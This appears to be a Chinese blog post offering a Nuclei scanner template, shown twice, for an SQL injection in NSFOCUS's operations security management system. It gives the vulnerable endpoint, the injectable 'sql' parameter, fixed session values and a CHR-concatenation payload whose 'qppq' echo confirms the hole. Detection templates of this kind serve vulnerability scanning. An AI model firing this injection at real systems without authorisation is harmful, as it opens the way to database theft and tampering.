绿盟运维安全管理系统SQL注入漏洞

### 解析要点

  • **漏洞名称**:绿盟运维安全管理系统SQL注入漏洞

  • **端点与方法**:GET /webconf/log/getDBType

  • **注入点**:`sql` 参数

  • **PoC关键参数**:`cat=espc`、`sid=7473a85e535405e7bd991cb82b2f134c`(假设为测试用固定值)

  • **响应证据**:执行注入后返回 `qppq`(由 `CHR(113)+CHR(112)+CHR(112)+CHR(113)` 生成)

  • **严重级别**:High(SQL注入无权限限制时默认High)

  • **参考链接**:用户提供的微信文章链接

### 最终YAML模板

复制代码
```yaml
id: nsfocus-ops-security-sqli-202512290956
info:
 name: 绿盟运维安全管理系统SQL注入漏洞
 author: auto-generator
 severity: High
 description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
 tags: [web, sqli, nsfocus, vulnerability]
 reference:
 - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
 classification:
 cwe-id: CWE-89
 cve-id: ""
 cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
stop-at-first-match: true
http:
 - raw:
 - |
 GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
 Host: {{Hostname}}
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
 Accept: */*
 Connection: close
 matchers-condition: and
 matchers:
 - type: status
 status:
 - 200
 - type: word
 part: body
 words:
 - "qppq"
 case-insensitive: false
``` 

**说明**:

  1. 模板采用PoC原始请求复刻,保留关键参数 `sid` 和 `cat`;

  2. 注入payload生成 `qppq` 字符串作为响应证据;

  3. 若 `sid` 为临时值,需替换为实际有效sid或通过前置请求获取;

  4. 严重级别按无权限限制SQL注入默认设为High,可根据实际CVSS调整。

  5. 符合Nuclei 3.x规范,包含必要的matchers和stop机制。

  6. 严格遵循用户需求,仅输出最终YAML模板,无多余内容。

    yaml 复制代码
    id: nsfocus-ops-security-sqli-202512290956
    
    info:
    
      name: 绿盟运维安全管理系统SQL注入漏洞
    
      author: auto-generator
    
      severity: High
    
      description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
    
      tags: [web, sqli, nsfocus, vulnerability]
    
      reference:
    
        - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
    
      classification:
    
        cwe-id: CWE-89
    
        cve-id: ""
    
        cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    
    stop-at-first-match: true
    
    http:
    
      - raw:
    
          - |
    
            GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
    
            Host: {{Hostname}}
    
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
    
            Accept: */*
    
            Connection: close
    
        matchers-condition: and
    
        matchers:
    
          - type: status
    
            status:
    
              - 200
    
          - type: word
    
            part: body
    
            words:
    
              - "qppq"
    
            case-insensitive: false
相关推荐
kaoa0002 小时前
Linux入门攻坚——62、memcached使用入门
linux·运维·memcached
model20053 小时前
alibaba linux3 系统盘清理
linux·运维·服务器
WG_173 小时前
Linux:动态库加载总结_进程间通信+进程池 + 进程IPC(27/28/29/30/31/32)
linux·运维·服务器
一只懒鱼a3 小时前
docker部署nacos (版本2.3.2)
运维·docker
Root_Hacker5 小时前
include文件包含个人笔记及c底层调试
android·linux·服务器·c语言·笔记·安全·php
\xin6 小时前
Fastjson 1.2.45仅JSON接口反序列化漏洞
安全·web安全·json
信创天地6 小时前
国产堡垒机部署实战:以奇安信、天融信为例构建运维安全三重防线
运维·安全
呉師傅6 小时前
东芝3525AC彩色复印机CC219测试页打印方法【实际操作】
运维·网络·windows·计算机外设·电脑
宴之敖者、8 小时前
Linux——权限
linux·运维·服务器
twcc_come8 小时前
渗透第一次作业
安全·web安全